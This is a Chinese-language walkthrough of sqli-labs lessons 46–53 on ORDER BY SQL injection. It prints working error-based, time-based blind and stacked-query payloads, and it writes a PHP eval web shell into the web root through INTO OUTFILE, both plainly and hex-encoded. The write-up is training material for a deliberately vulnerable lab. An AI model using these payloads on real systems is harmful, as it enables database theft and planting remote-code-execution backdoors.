Less_46

补充知识:MySQL知识

SQL语句中,asc是指定列按升序排列,desc则是指定列 按降序排列;

Select * from users order by 1 desc; 使用降序进行排列;

Select * from users order by 1  asc; 使用升序进行排列;

Right() select right(database(),1)  从右往左数第一个数据库;

Left()   select left(database(),1)  从左往右数第一个数据库;

less46没有使用包裹

输入?id=1  得到下面,所以我们使用?sort=1  进行操作  其中1代表把第一列按从小到大进行排列;

修改为2,即为将第二列按从小到大进行排列;

?Sort=2 desc;  使用降序进行排列;

?Id=2 asc;    使用升序进行排列;

说明这里存在注入漏洞

三种方法:

1.报错注入

2.时间盲注

3.一句话木马

方法一:报错注入

输入:?sort=3 and  updatexml( 1, concat( 0x7e, (database())), 1) --+ 得到当前数据库;

输入:?sort=3 and  updatexml( 1, concat( 0x7e, (select schema_name from information_schema.schemata limit 0,1), 1) ,1)--+ 得到第一个数据库名字;

方法二: 时间盲注

输入:?sort=3 and if(length(database()=1),1,sleep(5))--+

输入:?sort=3 and if(left((select schema_name from information_schema.schemata limit 0,1),1)>'s',1,sleep(5))--+

方法三:一句话木马

输入 ?sort=3  and (select '<?php @eval($_POST[gxy]);?>') into outfile 'C:\\phpStudy\\WWW\\c.php '--+ 

我们并没有把一句话木马写进去,所以我们采取  lines  terminated by 0x 十六进制进行注入

输入 ?sort=3   into outfile "C:\\phpStudy\\WWW\\c.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b27677879275d293b203f3e  --+

Less_47

Less47:使用’’包裹  其他与第46关基本一致

Less_48

Less48:  无包裹  不返回报错信息  不能使用报错注入,其他操作与第46关基本一致

 

Less_49

Less49:  使用“”包裹  不返回报错信息  不能使用报错注入,其他操作与第46关基本

Less_50

Less50无包裹

第50关与第46关不同的是 使用了mysqli_multi_query函数

mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。

所以我们可以用堆叠注入的方法;

五种方法:

1.时间的盲注

2.报错注入

3.写一句话木马

4.使用堆叠注入创建删除一个表

5.使用堆叠 注入写一句话木马

方法一:时间盲注

?sort=1 and if(length(database()>1),1,sleep(5)) --+

方法二:报错盲注

?sort=1 and updatexml(1,concat(0x7e,(database())),1)--+

方法三:写一句话木马

输入:?sort=1  and (select '<?php @eval($_POST[ztt]);?>') into outfile 'C:\\phpStudy\\WWW\\a.php '--+

发现一句话木马并没有,输入:?sort=1   into outfile "C:\\phpStudy\\WWW\\a.php" lines terminated by 0x3c3f70687020406576616c28245f504f53545b27677879275d293b203f3e  --+

方法四:使用堆叠注入创建一个表

?sort=3;create table ztt50 like users;insert into ztt50 select * from users;--+

Less_51

Less-51:  使用’’包裹  其他操作与第50关基本一致

五种方法:

1.时间的盲注

2.报错注入

3.写一句话木马

4.使用堆叠注入创建删除一个表

5.使用堆叠 注入写一句话木马

Less_52

Less-52:  无包裹  回显不显示错误  不能使用报错注入则其他方法与第50关基本一致

四种方法:

1.时间的盲注

2.写一句话木马

3.使用堆叠注入创建删除一个表

4.使用堆叠 注入写一句话木马

Less_53

Less-53:使用’’包裹  不回显错误  不能使用报错注入   其他方法与第50关基本一致

 

四种方法:

1.时间的盲注

2.写一句话木马

3.使用堆叠注入创建删除一个表

4.使用堆叠 注入写一句话木马

sqli-libs(46-53关)的更多相关文章

  1. SD card技术了解并WINCE下SDHC驱动开发(updated)

    Suumary: 简单介绍了一下SD卡的历史和发展,同时结合MX31 ADS上的WINCE 下SDHC驱动更深入的了解该硬件的一些行为特点. 了解SD card SD是Secure Digital C ...

  2. SQL-三级分类查询

    /*SQLyog 企业版 - MySQL GUI v8.14 MySQL - 5.5.40 : Database - appinfodb******************************** ...

  3. mysql表基本查询

    第一节 -- or # 单行注释/***多行注释*/ -- c创建数据库examCREATE DATABASE exam; USE exam; /*创建部门表*/CREATE TABLE dept( ...

  4. MySQL内存计算器

    MySQL如何使用内存? 首先,介绍MySQL使用内存的一些方法: 1. 会话级别的内存消耗(连接私有内存):如sort_buffer_size等,每个会话都会开辟一个sort_buffer_size ...

  5. bzoj AC倒序

    Search GO 说明:输入题号直接进入相应题目,如需搜索含数字的题目,请在关键词前加单引号 Problem ID Title Source AC Submit Y 1000 A+B Problem ...

  6. Linux软件包管理和磁盘管理实践

    一.自建yum仓库,分别为网络源和本地源 本地yum仓库的搭建就是以下三个步骤: 创建仓库目录结构 上传相应的包到目录下,或者直接挂载光盘也行,如果挂载光盘,第三步就可以省略,因为光盘默认里有repo ...

  7. Oracle精讲视频课程【价值1.67万】

    ke程链接 https://edu.51cto.com/center/course/lesson/index?id=14443 课程大纲: 0_Oracle学习路线分析(Oracle学习必读)[免费试 ...

  8. 资源描述结构(Resource Description Framework,RDF)

    资源描述框架(Resource Description Framework),一种用于描述Web资源的标记语言.RDF是一个处理元数据的XML(标准通用标记语言的子集)应用,所谓元数据,就是" ...

  9. 获取文本的编码类型(from logparse)

    import java.io.BufferedReader; import java.io.File; import java.io.FileInputStream; import java.io.F ...

  10. [机器学习] 深度学习之caffe1——软件配置与测试

    caffe的编译配置真的是很让人头疼啊,不知道试过多少次了~~~ 重装系统了七八次,搞得linux的一些常用命令倒是很熟悉了~~~ 我有洁癖~~~某一个点上出了错,我一定要把它搞好了,再重新来一次,我 ...

随机推荐

  1. 【巨杉数据库SequoiaDB】巨杉数据库荣获《金融电子化》“金融科技创新奖”

    巨杉助力金融科技创新 2019年12月19日,由<金融电子化>杂志社主办.北京金融科技产业联盟协办的“2019中国金融科技年会暨第十届金融科技及服务优秀创新奖颁奖典礼”在京成功召开.来自金 ...

  2. 【巨杉数据库SequoiaDB】巨杉Tech | 巨杉数据库数据高性能数据导入迁移实践

    SequoiaDB 一款自研金融级分布式数据库产品,支持标准SQL和分布式事务功能.支持复杂索引查询,兼容 MySQL.PGSQL.SparkSQL等SQL访问方式.SequoiaDB 在分布式存储功 ...

  3. [POI2008] STA-Station - 树形dp

    很显然的递推式ans[q] = ans[p] + n - 2*siz[q]; 这么个题你卡我常干嘛,害得我加快读 (谁叫我是vector党呢 #include <bits/stdc++.h> ...

  4. Hbase出现ServerNotRunningYetException的解决方案(退出hadoop的安全模式)

    退出安全模式 ./hadoop dfsadmin -safemode leave 然后出现 safemode  off就成功了

  5. webpack如何编译ES6打包

    前言:随着ES的普及我们越来越多的开始使用ES6的语法了,当然也随着mvvm框架的流行少不了js模块化,那js模块化又有那些呢 在很早的时候大家都用的命名空间,现在也有人用(库名.类别名.方法名) 后 ...

  6. Intellij IDEA史上最全快捷键大全

    古人有云:工欲善其事,必先利其器,要是只是手握利器,而不能发挥其最大的效益,那无异于赤手空拳,对敌对垒. 那古人所云,未得其精髓,只能为碎语闲言尔. 自动代码 常用的有fori/sout/psvm+T ...

  7. JDBC未知列

    Exception in thread "main" com.mysql.jdbc.exceptions.jdbc4. MySQLSyntaxErrorException: Unk ...

  8. go语言 base64编码解码

    package main import ( "encoding/base64" "fmt" ) func main() { str := "Man&q ...

  9. 1、Two Sum

    Given an array of integers, return indices of the two numbers such that they add up to a specific ta ...

  10. Android 开发 微信分享,登陆,获取信息

    1 获取appid和appsecret.        https://open.weixin.qq.com/cgi-bin/index?t=home/index&lang=zh_CN     ...